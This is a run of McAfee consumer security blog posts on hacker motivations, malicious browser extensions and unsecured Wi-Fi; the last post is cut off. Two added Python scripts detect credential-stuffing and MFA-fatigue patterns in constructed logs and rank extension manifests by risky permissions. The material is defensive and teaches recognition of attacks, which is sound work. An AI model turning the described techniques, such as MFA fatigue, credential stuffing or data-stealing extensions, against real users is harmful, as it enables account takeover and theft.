
7 Types of Hacker Motivations

By: McAfee

Hackers are not created equal, nor do they have the same purpose. Some hackers are paid to scrutinize security systems, find loopholes, fix weaknesses, and ultimately protect organizations and people. Others exploit those same gaps for profit, power, or disruption. What separates hackers isn’t just skill level or tactics; it’s intent. 

The purpose behind an attack changes everything about how hackers shape their tactics and how the hacking process unfolds: who is targeted, which methods and tools are used, how patient the attacker is, and the kind of damage they want to cause.

The primary motivations behind these cyberattacks fall into several categories, from financial gain to recognition, and sometimes even coercion. Each driver creates different risk scenarios for your digital life, from your home banking sessions to your workplace communications. Understanding a hacker’s motivations will enable you to better protect yourself and recognize potential threats in both your personal and professional life. 

In this article, we’ll look at the main types of hackers you might encounter, the core motivations and mindset that drive these cyberattacks, and finally, how you can protect yourself against these attacks.

Good and bad hackers

From its beginnings as an intellectual exploration in universities, hacking was driven by curiosity, learning, and the thrill of solving complex problems. Today, it has become industrialized with organized criminal groups and state-sponsored actors entering the scene. 

Modern hacking has seen the emergence of advanced persistent threats and nation-state campaigns targeting critical infrastructure and combining traditional techniques with artificial intelligence. To better understand the types of hackers, here is a window into what they do and why:

White hat hackers

These are the good guys, typically computer security experts who specialize in penetration testing and other methodologies to ensure that a company’s information systems are secure. These IT security professionals rely on a constantly evolving arsenal of technology to battle hackers.

Black hat hackers

These are the bad guys, who are typically referred to as just plain hackers. The term is often used specifically for hackers who break into networks or computers, or create computer viruses. Unfortunately, black hat hackers continue to technologically outpace white hats, often finding the path of least resistance, whether due to human error or laziness, or with a new type of attack. Hacking purists often use the term “crackers” to refer to black hat hackers, whose motivation is generally to get paid.

Script kiddies

This is a derogatory term for black hat hackers who use borrowed programs to attack networks and deface websites in an attempt to make names for themselves. Script kiddies, sometimes called script kitties, might be beginners, but don’t be fooled by their newbie status. With the right tools and right targets, they can wreak as much havoc as a seasoned hacker.

Hacktivists

Some hacker activists are motivated by politics or religion, while others aim to expose wrongdoing or exact revenge. Activists typically target government agencies, public services, and organizations involved in controversial issues related to defense, elections, wars, finance, or social movements. They also attack high-profile individuals, such as executives, public figures, journalists, and activists.

State-sponsored hackers

State-sponsored hackers have limitless time and funding to target civilians, corporations, other governments, or even prominent citizens connected to a larger objective. Their motivations are driven by their government’s strategic goals: gathering intelligence, stealing sensitive research or intellectual property, influencing public perception, or disrupting critical infrastructure. Because they are playing a long game, state-sponsored hackers are stealthy and persistent, quietly embedding themselves in systems, mapping networks, and waiting for the right moment to act.

Spy hackers

Corporations hire hackers to infiltrate their competitors and steal trade secrets, including product designs, source code, pricing plans, customer lists, legal documents, and merger or acquisition strategies. They may hack from the outside or gain employment in order to act as a mole, impersonating recruiters, partners, or vendors to get insiders to share access. They also take advantage of weak internal controls, such as excessive permissions, unsecured file-sharing links, or poor offboarding practices. Spy hackers may use similar tactics as hacktivists or state-sponsored espionage on a smaller scale: stealthy entry, careful privilege escalation, and long-term persistence to avoid triggering alarms. The stolen data is often not leaked publicly but delivered directly to the client and used behind the scenes.

Cyber terrorists

These hackers, generally motivated by religious or political beliefs, attempt to create terror, chaos, and real-world harm by disrupting critical infrastructures such as power grids, water systems, transportation networks, hospitals, emergency services, and government operations. They combine cyber operations with propaganda campaigns and physical attacks on the systems people rely on to live safely to create turmoil far beyond the screen. 

Understand hackers’ motivations

Cybercriminals aren’t just faceless entities; they’re driven by specific goals that shape their tactics and targets. Understanding their motivations empowers you to recognize potential threats and better protect yourself, your family, and colleagues.

Financial gain

Money remains the most common motivator. These profit-driven attacks directly impact your personal finances through methods such as ransomware, credit card fraud, and identity theft. In your home, financially motivated hackers target your banking apps, shopping accounts, and personal devices to steal payment information or hold your data hostage. In the workplace, they focus on payroll systems, customer databases, and business banking credentials.

Ideological motivations

Ideologically driven hackers, called hacktivists, pursue political or social causes through cyber means. These attacks can disrupt services that you rely on daily, from public utilities to private organizations that provide essential services or take public stances on divisive issues. Your best defense involves staying informed about potential disruptions and maintaining backup communication methods for essential services.

Curiosity and learning

Many hackers begin their journey with genuine curiosity about how systems work. They might probe your home network, test website security, or experiment with app vulnerabilities, not necessarily for malicious purposes, but their activities can still expose your data or disrupt services. In professional environments, these individuals might target systems or databases simply to see if they can gain access.

Recognition and reputation building

Some hackers seek fame, respect within hacker communities, or professional advancement rather than immediate financial benefit. They often target high-profile individuals, popular websites, or well-known companies to maximize the visibility for their exploits. If you have a significant social media following, your accounts could become targets for these attacks. They might also focus on defacing company or government websites, or leaking non-sensitive but embarrassing information.

State and corporate intelligence

Nation-state and corporate espionage are some of the most sophisticated threats in cyberspace, making it a top national security concern for both government and private sector. These operations compromise daily services and infrastructure such as internet service providers, email platforms, or cloud storage services to gather intelligence such as intellectual property, customer lists, or strategic planning documents. 

Coercion and extortion

Some hackers use cyber capabilities to intimidate or coerce victims into specific actions. In the FBI’s Internet Crime Complaint Center report for 2024, extortion ranked second among all cybercrimes by number of complaints, demonstrating the growing prevalence of coercion-based attacks. Coercion might involve compromising personal photos, social media accounts, or private communications to demand payment or behavioral changes. Workplace coercion could target executives with embarrassing information or threaten to leak sensitive business data unless demands are met.

The intersection of motivations

Many real-world attacks combine multiple motivations—a financially driven criminal might also seek recognition within hacker communities, or an ideological hacker might generate revenue through ransomware. The contrast between ethical hacker motivations and malicious ones often lies in the permission, legality, and intent. Understanding why people become hackers helps you recognize that not all hacking activity is inherently malicious, although all unauthorized access ultimately poses risks to your security and privacy.

The psychology behind cyberattacks

Understanding the psychology behind cyberattacks gives you a powerful advantage in protecting yourself. When you know what drives hackers, you can better spot their tactics and stay one step ahead.

High reward, low risk

Many hackers operate with the goal of achieving high reward for perceived low risk. This risk-reward imbalance motivates attackers because they can potentially access valuable personal or financial information while remaining physically distant from their victims. This means hackers often target easy opportunities, such as when you click on suspicious links or download questionable attachments, to gain access with minimal effort. For instance, a hacker would rather send 10,000 phishing emails hoping for a few bites than attempt one complex, risky attack.

Exploiting normal human responses 

Hackers exploit well-known psychological shortcuts your brain takes. They understand that you’re more likely to trust familiar-looking emails, act quickly under pressure, or follow authority figures without question. These aren’t weaknesses, these are normal human responses that attackers deliberately manipulate. For example, urgent messages claiming your account will be closed create an artificial time pressure, making you more likely to click without thinking.

The power of group dynamics

Many successful cyberattacks leverage the human tendency to follow what others are doing. Hackers create fake social media profiles, forge customer reviews, or impersonate colleagues to make their requests seem legitimate and widely accepted. In ransomware attacks targeting businesses, criminals often research company hierarchies and communication styles to make their demands appear to come from trusted sources within the organization. 

The gamification of cybercrime

Modern hacking has elements that make it feel like a game to perpetrators. Some online forums award points for successful attacks, creating competition and recognition among criminals. This helps explain why some hackers target individuals rather than large corporations, as every successful phishing attempt becomes a score, and why attacks continue to evolve. 

Common hacking methods

Hackers don’t all use the same tricks, but most successful attacks rely on a familiar toolkit of methods that exploit common technical gaps and human habits. Recognizing these common techniques will help you avoid danger earlier on.

• Phishing and smishing. These attacks trick you into revealing sensitive information through fraudulent emails (phishing) or text messages (smishing). Modern attackers increasingly use AI-generated content and sophisticated social engineering techniques that make these messages appear more legitimate than ever before.
• Credential stuffing. Cybercriminals use automated tools to test stolen username and password combinations across multiple websites, exploiting the fact that many people reuse passwords. This attack method has become more efficient as attackers leverage large-scale data breaches and improved automation tools.
• Multi-factor authentication (MFA) fatigue. Attackers repeatedly send MFA requests until an overwhelmed, frustrated, or confused user approves one. This technique has gained prominence as more organizations adopt MFA, with attackers finding ways to exploit user behavior around security notifications.
• Malvertising. Malicious advertisements on legitimate websites can install malware or redirect you to harmful sites without requiring any clicks. Recent trends show attackers using sophisticated techniques to bypass ad network security filters.
• Remote desktop attacks. Hackers exploit weak or default passwords on remote desktop services to gain unauthorized access to systems, particularly targeting businesses with remote work setups. The rise of hybrid work environments since 2023 has made this attack vector increasingly attractive to cybercriminals. Disable remote desktop services when not needed and use VPNs with strong authentication for legitimate remote access.
• USB baiting. Attackers leave infected USB devices in public places, hoping curious individuals will plug them into their computers, automatically installing malware. Modern USB attacks can execute within seconds of being connected, making them particularly dangerous in today’s fast-paced work environment.
• Unsecured Wi-Fi networks. Unsecured public Wi-Fi and home networks create opportunities for hackers to gain access to your devices or intercept your sensitive information, such as passwords, emails, and banking details. Sometimes, cybercriminals create fake Wi-Fi hotspots with legitimate-sounding names to trick users into connecting.
• Unsafe downloads. Hackers disguise malicious software as legitimate programs, games, documents, or updates to trick users into installing them. These malicious downloads may come from infected email attachments, fake or pirated software, or even compromised websites. Once installed, the malware can steal your information, lock your files for ransom, or give hackers access to your computer.
• Tech support scams. Tech support scams rely on social engineering rather than technical exploits: scammers typically contact you by phone and insist your computer has been infected or compromised. They create urgency and fear to convince you to install remote access software that gives them complete control of your computer. Once they have access, they can steal personal information, install malware, or hold your files hostage.
• Outdated software. Running outdated software creates security vulnerabilities that hackers actively leverage. When software developers discover security vulnerabilities, they release patches to fix these problems. If you don’t install these updates promptly, your system remains vulnerable to attacks. Hackers maintain databases of unpatched systems and use automated tools to find and exploit them.
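Two of the methods above, credential stuffing and MFA fatigue, leave a recognisable footprint in authentication logs: one source address failing logins against many different accounts in a short burst, and one account receiving a run of MFA push prompts until one is approved. The script below is an added example (not McAfee's code) that flags both patterns. The log line format and every address, username and timestamp in it are constructed for illustration; point the regular expression at your own identity provider's fields.

```python
"""Flag credential-stuffing and MFA-fatigue patterns in authentication logs.

Added example, not from the McAfee post. The log format and sample lines
below are constructed; adapt LOG_RE to the fields your identity provider emits.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) event=(?P<event>\S+)$"
)

# Constructed sample: one IP spraying many accounts, one user flooded with MFA pushes
SAMPLE_LOG = """\
2024-05-01T10:00:01Z src=203.0.113.5 user=alice event=login_failed
2024-05-01T10:00:02Z src=203.0.113.5 user=bob event=login_failed
2024-05-01T10:00:03Z src=203.0.113.5 user=carol event=login_failed
2024-05-01T10:00:04Z src=203.0.113.5 user=dave event=login_failed
2024-05-01T10:00:05Z src=203.0.113.5 user=erin event=login_failed
2024-05-01T10:00:06Z src=203.0.113.5 user=frank event=login_success
2024-05-01T10:05:00Z src=198.51.100.9 user=alice event=login_failed
2024-05-01T10:05:30Z src=198.51.100.9 user=alice event=login_failed
2024-05-01T11:00:00Z src=192.0.2.77 user=grace event=mfa_push_sent
2024-05-01T11:00:20Z src=192.0.2.77 user=grace event=mfa_push_denied
2024-05-01T11:00:40Z src=192.0.2.77 user=grace event=mfa_push_sent
2024-05-01T11:01:00Z src=192.0.2.77 user=grace event=mfa_push_denied
2024-05-01T11:01:20Z src=192.0.2.77 user=grace event=mfa_push_sent
2024-05-01T11:01:40Z src=192.0.2.77 user=grace event=mfa_push_sent
2024-05-01T11:02:00Z src=192.0.2.77 user=grace event=mfa_push_approved
2024-05-01T12:00:00Z src=10.0.0.8 user=heidi event=mfa_push_sent
2024-05-01T12:00:10Z src=10.0.0.8 user=heidi event=mfa_push_approved
"""


def parse(text):
    """Yield (timestamp, src, user, event) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["src"], m["user"], m["event"]


def credential_stuffing_sources(text, window=timedelta(minutes=5), min_users=5):
    """Return source IPs whose failed logins hit >= min_users distinct accounts
    inside any `window`-long span. A single user failing repeatedly (a forgotten
    password, or plain brute force) does not trip this rule; breadth does."""
    fails = defaultdict(list)
    for ts, src, user, event in parse(text):
        if event == "login_failed":
            fails[src].append((ts, user))
    flagged = []
    for src, attempts in fails.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_users:
                flagged.append(src)
                break
    return sorted(flagged)


def mfa_fatigue_users(text, window=timedelta(minutes=10), min_prompts=3):
    """Map each user who received >= min_prompts MFA pushes within `window`
    to whether an approval landed inside that same window (the worn-down-user
    outcome). Denials are deliberately ignored: the burst itself is the signal."""
    pushes, approvals = defaultdict(list), defaultdict(list)
    for ts, _, user, event in parse(text):
        if event == "mfa_push_sent":
            pushes[user].append(ts)
        elif event == "mfa_push_approved":
            approvals[user].append(ts)
    flagged = {}
    for user, sent in pushes.items():
        sent.sort()
        for i, start in enumerate(sent):
            burst = [t for t in sent[i:] if t - start <= window]
            if len(burst) >= min_prompts:
                flagged[user] = any(start <= a <= start + window for a in approvals[user])
                break
    return flagged


if __name__ == "__main__":
    print("credential stuffing from:", credential_stuffing_sources(SAMPLE_LOG))
    print("MFA fatigue (user -> approved?):", mfa_fatigue_users(SAMPLE_LOG))
```

On the constructed sample the first check names 203.0.113.5 (five different accounts in five seconds) and ignores 198.51.100.9, which only retried one account; the second names grace, whose burst of four prompts ended in an approval, and not heidi, who received a single prompt for a login she made herself. Thresholds are starting points: tune them against a baseline of your own normal traffic before alerting on them.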

Defensive tips to protect yourself from hack attacks

Your strongest defense against hacking combines technical safeguards, security awareness, and some consistent habits that shut down the most common paths attackers use. Here’s how to put those defenses in place and make your digital life a much harder target.

• Install comprehensive security software. The Cybersecurity and Infrastructure Security Agency recommends a layered security approach to prevent multiple types of threats simultaneously. Choose a reputable security suite that offers real-time protection, anti-malware scanning, and web browsing safety features.
• Enable MFA everywhere. Add an extra security layer to all your important accounts: email, banking, social media, and work platforms. Only approve MFA requests that you initiated yourself, and report any unexpected authentication prompts to your IT team or service provider immediately.
• Use a password manager. Create complex, unique passwords using a trusted password manager for every account you own. The National Institute of Standards and Technology recommends passwords that are at least 12 characters long and completely unique across all your accounts to prevent credential stuffing attacks.
• Keep all software updated. Enable automatic updates for your operating system, apps, and security software, as many successful cyberattacks exploit known weaknesses that could have been prevented with timely updates.
• Secure your internet connections. Avoid using public Wi-Fi for sensitive activities, and use a reputable VPN when you must connect to untrusted networks. Unsecured public networks make it easy for attackers to intercept your data and credentials.
• Implement the 3-2-1 backup strategy. Regular, tested backups are your best defense against ransomware and data loss incidents. Keep three copies of important data—on your device, on an external drive, and in secure cloud storage.
• Develop scam-spotting skills. Scammers continuously adapt their tactics to current events, so staying informed about the latest schemes and learning to recognize phishing emails, suspicious links, and social engineering tactics will help you stay one step ahead.
• Practice good digital hygiene. Regularly review your account permissions, remove unused apps, and monitor your financial statements for unauthorized activity to lessen your exposure to identity theft and privacy breaches.
• Monitor your accounts regularly. Check bank statements, credit reports, and account activity monthly. Set up account alerts for unusual activity when available.
• Limit personal information sharing. Only provide the necessary information to companies or service providers to reduce your digital footprint. In addition, review privacy settings and avoid oversharing on social media, as scammers and hackers regularly prowl these platforms.

Final thoughts

Now that you understand hackers’ motivations and psychological drivers, you can flip the script and turn it to your advantage. Instead of being the target, become the informed defender who recognizes manipulation tactics and responds thoughtfully rather than reactively. This knowledge empowers you to spot potential threats earlier, choose stronger protective measures, and navigate the digital world with greater confidence.

When someone pressures you to act immediately, that’s your cue to slow down and verify the request. Question familiar-looking messages, even if they look official. Check the sender’s address and contact the company through official channels. Trust your instincts and investigate before acting. Stay curious and keep learning from reputable cybersecurity resources that publish current research and threat intelligence. Share these tips with your family members and friends, especially those who might be less technologically savvy.

McAfee+ includes proactive identity surveillance to monitor subscribers’ credit and personal information, as well as access to live fraud resolution agents who can help subscribers work through the process of resolving identity theft issues.

The post 7 Types of Hacker Motivations appeared first on McAfee Blog.

Learn to Identify and Avoid Malicious Browser Extensions

Browser extensions have become essential parts of how we browse, bank, work, and shop online. From password managers to ad blockers, these tools can significantly improve your digital life when chosen wisely. Almost all popular browsers support extensions, which unfortunately also makes them one of the most commonly used malware attack vectors.

In this guide, you will learn about the advantages and security risks of browser extensions, the role that permissions play in protecting your privacy when using these extensions, and some best practices when using them.

Browser extensions and their malicious counterparts

Browser extensions are small software programs that enhance your web browser by adding new functionality or modifying existing functionality. Think of them as helpful extra tools that can block ads, manage passwords, check prices while shopping, or customize how websites look and behave. Legitimate extensions make your browsing experience more efficient and enjoyable.

Cybercriminals, however, have taken advantage of their popularity by creating malicious versions disguised as useful tools that secretly operate with harmful intentions. Some of these malicious browser extensions access and modify web pages, monitor your browsing activity, and interact with websites on your behalf.

While legitimate extensions request only the minimum permissions necessary for their stated purpose, malicious extensions often request more permissions than they need in order to access your browsing data and history.

Core tactics of malicious browser extensions

Malicious browser extensions typically operate through specific methods that can significantly impact your daily online activities, from casual browsing to important financial transactions, including:

• Permission abuse occurs when an extension requests far more access than it needs to operate. For example, a weather extension that claims to show local forecasts might request permission to track the websites you visit, allowing it to monitor everything you do online and capture sensitive information such as passwords and credit card numbers without your knowledge.
• Ad injection is where malicious extensions insert unwanted advertisements into web pages you’re viewing, appearing as pop-ups, banner ads, or even replacing legitimate advertisements with malicious ones. These injected ads disrupt your browsing experience, can lead to scam websites, or attempt to trick you into downloading additional malware.
• Data theft is one of the most serious threats posed by malicious extensions. These programs can silently capture everything you type, including usernames, passwords, credit card information, and personal details, exposing your personal information to cybercriminals. When you log into your online banking or online shopping account, the malicious extension might record your login credentials and account information.
• Traffic redirection involves redirecting your legitimate web traffic to scam websites designed to steal your information or trick you into making fraudulent purchases. This is particularly dangerous when you’re trying to access your bank’s website or other financial services, but are redirected to a convincing fake site that could capture your login credentials.
• Drive-by downloads can be triggered by these ill-intentioned browser extensions when you visit specific websites, click on seemingly innocent links or files, or even during routine browsing activities. The links and files are disguised as legitimate software updates, media files, or useful applications that, in fact, could infect your device with ransomware, keyloggers, or other types of malware.
• Cryptocurrency mining extensions secretly use your computer’s processing power to mine cryptocurrency for the extension creator, running resource-intensive calculations in the background without your knowledge or consent. This unauthorized mining activity causes your device to run more slowly, drain your laptop battery faster, consume more electricity, generate excess heat, and potentially shorten your hardware’s lifespan.

The impact of malicious browser extensions

If not caught, malicious extensions can disrupt your daily life and compromise your personal security.

Malicious extensions violate your privacy when they monitor your online behavior and track the websites you view, build a profile of your habits and preferences, and even obtain your home address and other personal details. These details can be used for identity theft, social engineering attacks, or sold to data brokers, ultimately compromising your privacy and potentially affecting your real-world safety and financial security.

When it comes to online shopping, some malicious extensions could pressure you into hasty purchase decisions, intercept your checkout process, and capture your payment information. Once cybercriminals have your shopping account credentials, they can impersonate you to make unauthorized purchases.

Similar incidents could happen with your banking and financial accounts. Malicious browser extensions can steal your login credentials, account numbers, transaction details, and eventually your money. Some cybercriminals have gone as far as opening new accounts and applying for loans using your stolen information.

The most insidious aspect of malicious browser extensions is their ability to operate silently in the background while maintaining the appearance of legitimate functionality. A malicious extension might continue providing its advertised service—such as weather updates or price comparisons—while simultaneously conducting harmful activities, making them effective at avoiding detection.

On top of the higher electricity bills, degraded device performance and browsing experience, and wasted network bandwidth, malicious extensions turn your device into an unwitting money-making tool for cybercriminals while you bear the operational costs. Furthermore, malicious extensions could potentially expose you to additional malware or scams, and involve you in fraudulent advertising schemes.

Their impact extends beyond your own device and could affect your entire household. On shared networks and devices, malicious extensions can spread and compromise other users.

Guidelines to stay safe with browser extensions

Chrome extensions can absolutely be safe to use when you approach them with the right knowledge and precautions. The vast majority of extensions on the official Chrome Web Store undergo Google’s review process and are built by legitimate, reputable developers who aim to enhance your browsing experience and follow security best practices.

Additionally, the Chrome Web Store’s rating system and user reviews provide valuable insights into an extension’s reliability and performance. When you stick to well-established extensions with thousands of positive reviews and regular updates, you’re generally in safe territory.

However, the extension ecosystem does present a few security challenges. The primary risks come from two main areas: permission abuse and post-installation behavior changes. When you install an extension, you give it permission to access various aspects of your browsing data and your device. Some extensions may request more permissions than they actually need, creating potential privacy and security vulnerabilities. Even more concerning, some extensions start with benign functionality but later receive updates that introduce malicious features, or get sold to malicious actors who update them with data-harvesting capabilities, turning a once-safe extension into a potential threat.

To help you navigate these challenges safely, here’s a practical risk assessment framework you can use before installing any Chrome extension. This systematic approach takes just a few minutes but can save you from potential headaches down the road.

Step 1: Evaluate the source’s reputation

Start by examining who created the extension. Look for extensions developed by well-known companies or developers with established track records. Check the developer’s website and other extensions they’ve created. Extensions from companies like Google, Microsoft, or other recognized tech firms generally carry lower risk profiles. For individual developers, look for those who maintain a professional online presence and have created multiple successful extensions.

Step 2: Analyze user reviews and ratings

Don’t just glance at the overall star rating. Read the actual reviews, look for patterns in user feedback, and pay special attention to recent comments that might indicate changes in the extension’s behavior. Be wary of extensions with suspiciously perfect ratings or reviews that seem artificially generated. Legitimate extensions typically have a mix of ratings with detailed, specific feedback from real users.

Step 3: Examine permission requests carefully

This is perhaps the most critical step in your assessment. When you click “Add to Chrome,” pay close attention to the permission dialog that appears. Ask whether the requested permissions make sense for the tool’s functionality, and be particularly cautious of extensions requesting broad permissions such as “Read and change all your data on the websites you visit.”

Step 4: Check installation numbers and update history

Extensions with millions of users and regular updates are generally safer bets than those with just a few hundred installations. However, don’t let high installation numbers alone convince you. Look for extensions that receive regular updates, which indicates active maintenance and ongoing security attention from developers.

Step 5: Research recent security issues

Before installing, do a quick web search for the extension name with terms like “security,” “malware,” or “removed.” This will reveal any recent security incidents or concerns that other users have reported. Security researchers and tech blogs often publish warnings about problematic extensions, information that can be invaluable in your decision-making process.

Ongoing browser security

The security landscape changes constantly, and extensions that are safe today might develop problems in the future. This is why ongoing vigilance is just as important as your initial assessment.

    • Install only as needed: Adopt a minimalist approach to installing extensions, as every browser extension you add increases your attack surface. Only install those you absolutely need.
    • Regularly audit your installed extensions: Set a reminder to review your extensions every few months, removing any that you no longer use or that haven’t been updated recently. This reduces your attack surface and helps keep your browser running efficiently.
    • Be wary of unrealistic benefits: When adding new browser extensions, be cautious of those that promise fantastic functions such as dramatically increasing internet speed or providing access to premium content for free. Extensions that require you to create accounts with suspicious email verification processes or that ask for payment information outside of Google’s official channels should also raise red flags.
    • Be cautious of duplicate functions: Be suspicious if the extension is replicating functionality already built into Chrome, as these often exist primarily to harvest user data. Extensions with generic names, poor grammar in their descriptions, or unprofessional-looking icons and screenshots indicate lower development standards and potentially higher security risks.
    • Install only from official stores: While not perfect, official browser stores offer significantly more security oversight than third-party sources or direct installation methods. Their layers of security screening include automated malware detection, manual code reviews for popular extensions, continuous monitoring for suspicious behavior, review systems, and developer verification processes.
    • Enable automatic updates and smart monitoring: Browser updates often include enhanced extension security and additional protection mechanisms that help detect and prevent malicious extension behavior. In addition, implement a monitoring system to identify extensions that update unusually frequently or at suspicious times, such as during periods you’re less likely to notice behavioral changes.
    • Deploy comprehensive protections: Integrate your browser extension security with broader security measures that can monitor extension behavior and detect suspicious activities such as unauthorized data access, unexpected network connections, or attempts to modify system files. These tools use behavioral analysis and machine learning to identify malicious patterns that might not be apparent through manual observation.
    • Secure your shopping and banking accounts: Your financial transactions and shopping activities represent high-value targets that need specialized protections. Consider using a dedicated browser for financial activities to isolate your transactions or temporarily disable extensions not related to security or privacy. Enable multi-factor authentication to prevent unauthorized access even if a malicious extension captures your primary login credentials.
    • Create a positive security routine: Establish straightforward security routines that include the measures listed above to ensure that your shopping, banking, and general browsing activities remain secure while still allowing you to benefit from the enhanced functionality that well-designed extensions provide.
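
The audit and permission points above can be turned into a repeatable check. The script below is an added example, not McAfee's code or any browser vendor's tool: it scores unpacked extension manifests by the permissions and host patterns they request, so a quarterly review starts from a ranked list instead of a guess. Chromium-based browsers keep installed extensions unpacked under the profile's Extensions folder (one manifest.json per installed version); the directory layout, the risk weights and the two sample manifests are this example's own assumptions, constructed for the demonstration.

```python
"""Audit unpacked browser-extension manifests for risky permissions.

Added example, not McAfee's code. Point audit_extensions_dir at a folder of
unpacked extensions (Chromium keeps one manifest.json per installed version
under the profile's Extensions folder) to get a list ranked by risk.
The manifests in SAMPLE_MANIFESTS are constructed for the demonstration.
"""
import json
import tempfile
from pathlib import Path

# Permissions that let an extension read or alter what you do in the browser.
# The weights are this example's own judgement, not a scale defined by Chrome.
RISKY_PERMISSIONS = {
    "cookies": 3, "nativeMessaging": 3, "proxy": 3, "debugger": 3, "webRequestBlocking": 3,
    "webRequest": 2, "declarativeNetRequest": 2, "history": 2, "scripting": 2,
    "clipboardRead": 2, "management": 2, "webNavigation": 2,
    "tabs": 1, "downloads": 1,
}
# Match patterns that grant access to every site rather than one origin
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def score_manifest(manifest):
    """Return a dict with the extension's name, version, risk score and reasons."""
    perms = list(manifest.get("permissions", [])) + list(manifest.get("optional_permissions", []))
    # Manifest V3 lists host patterns separately; V2 mixed them into "permissions"
    hosts = list(manifest.get("host_permissions", [])) + [p for p in perms if "://" in p or p == "<all_urls>"]
    score, reasons = 0, []
    for p in perms:
        if p in RISKY_PERMISSIONS:
            score += RISKY_PERMISSIONS[p]
            reasons.append("permission " + p)
    if BROAD_HOSTS & set(hosts):
        score += 3
        reasons.append("host access to all websites")
    for cs in manifest.get("content_scripts", []):
        if BROAD_HOSTS & set(cs.get("matches", [])):
            score += 2
            reasons.append("content script injected into every page")
            break
    return {"name": manifest.get("name", "?"), "version": manifest.get("version", "?"),
            "score": score, "reasons": reasons}


def audit_extensions_dir(root):
    """Score every manifest.json below root, highest risk first; unreadable files are skipped."""
    results = []
    for path in sorted(Path(root).rglob("manifest.json")):
        try:
            results.append(score_manifest(json.loads(path.read_text(encoding="utf-8"))))
        except (OSError, ValueError):
            continue
    return sorted(results, key=lambda r: r["score"], reverse=True)


# Constructed sample manifests: a data-hungry "deal finder" and a harmless tab counter
SAMPLE_MANIFESTS = {
    "dealfinder/1.2.0": {
        "manifest_version": 3, "name": "Deal Finder (constructed)", "version": "1.2.0",
        "permissions": ["cookies", "webRequest", "tabs", "storage"],
        "host_permissions": ["<all_urls>"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
    },
    "tabcounter/0.9.1": {
        "manifest_version": 3, "name": "Tab Counter (constructed)", "version": "0.9.1",
        "permissions": ["tabs"],
    },
}


def demo():
    """Write the sample manifests to a temporary tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, manifest in SAMPLE_MANIFESTS.items():
            d = Path(tmp) / rel
            d.mkdir(parents=True)
            (d / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
        return audit_extensions_dir(tmp)


if __name__ == "__main__":
    for r in demo():
        print(f"{r['score']:>3}  {r['name']} {r['version']}: {', '.join(r['reasons']) or 'no risky permissions'}")
```

A high score is a prompt to look closer, not proof of malice: a password manager legitimately needs broad host access, while a tab counter does not. The useful question for each flagged entry is whether the permission matches what the extension claims to do.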

    Thankfully, Google continues to improve its security measures for the Chrome Web Store by implementing stricter review processes for extensions and enhancing its ability to detect and remove malicious extensions after they’ve been published. For additional protection, enable Chrome’s Enhanced Safe Browsing, under the browser’s Privacy and Security section.

    Malicious browser extensions also pose similar threats across all major browser ecosystems, with attackers targeting the same vulnerabilities: excessive permissions, post-installation payload updates, and social engineering tactics.

    Safari’s extension model, while more restrictive, still allows extensions to access browsing data and modify web content when you grant permissions. Microsoft Edge, built on Chromium, shares Chrome’s extension architecture and therefore inherits many of the same security challenges, though Microsoft has implemented additional screening measures for their Edge Add-ons store. Regardless of which browser you use, the fundamental protection strategies remain consistent.

    Action plan if you’ve installed a malicious extension

    If you suspect you’ve installed a malicious browser extension by mistake, speed matters in the race to protect your accounts. Follow this clear, step-by-step guide to remove the extension, secure your accounts, and check for any signs of compromise.

    1. Immediately disconnect sensitive accounts: Sign out of all banking, shopping, and financial accounts you’ve accessed recently. Malicious extensions can capture session tokens and credentials in real-time, making immediate disconnection critical to prevent unauthorized access.
    2. Remove the malicious extension completely: Open your browser settings and navigate to the Extensions or Add-ons section. Locate the suspicious extension and click “Remove” or “Uninstall.” Don’t just disable it. Check for related extensions that may have been installed simultaneously, as malicious extensions often come in bundles.
    3. Clear all cookies and site data: Go to your browser’s privacy settings and clear all stored cookies, cached data, and site data to remove persistent tracking mechanisms or stored credentials the malicious extension may have accessed or modified. Pay special attention to clearing data from the past 30 days or since you first noticed suspicious activity.
    4. Change all your passwords immediately: Start with your most sensitive accounts—banking, email, and work credentials—followed by all other accounts. Use strong, unique passwords so that any credentials the malicious extension captured can no longer be used to access your accounts. As mentioned earlier, enable multi-factor authentication.
    5. Run a comprehensive security scan: Use reputable security software such as McAfee+ to perform full system scans on all devices where you’ve accessed sensitive accounts. Because malicious extensions can download additional malware or leave traces, it is best to schedule follow-up scans over the next few days to catch any delayed payloads.
    6. Review all account activity thoroughly: Many malicious extensions operate silently for weeks before executing their primary payload. So keep monitoring your login history, transaction records, and changes in account settings across all your accounts, and look for any unauthorized transactions.
    7. Set up account alerts: Set up automated account alerts for all transactions and closely monitor your bank and credit card statements for the next 60-90 days. Place fraud alerts with major credit bureaus if you suspect identity information may have been compromised.

    Final thoughts

    Browser extensions offer great functionality and convenience, but they can also introduce cybersecurity risks. With the right combination of smart browsing habits, regular security audits, comprehensive protection tools, and staying informed, you can safely explore the web, manage your finances online, and shop without worry.

    Make it a habit to question your intent to install a new extension, and download only from official browser stores. Review your installed extensions monthly—determine if each one still serves your needs. These practices, combined with keeping your browser and operating system updated, and employing trusted security software, reinforce your defense against evolving online threats. Remember to research any new browser extensions thoroughly before installation, checking developer credentials and reading recent user reviews to identify which browser extensions to avoid.

    The post Learn to Identify and Avoid Malicious Browser Extensions appeared first on McAfee Blog.

    Verify Secure Wireless Networks to Prevent Identity Theft

    By: McAfee

    The ability to connect wirelessly is indispensable in our lives today. Wireless internet is available in our homes, offices, cafes, restaurants, parks, hotels, airports, cars, and even airplanes. The mobility factor allows us to work anytime, anywhere, on numerous devices. “Being connected” is at an all-time high.

    Wireless internet is amazing and convenient. Sadly, unsecured, unprotected wireless is everywhere. When a device connects to unprotected Wi-Fi, all the data stored on that device becomes accessible to a hacker using the proper sniffing tools.

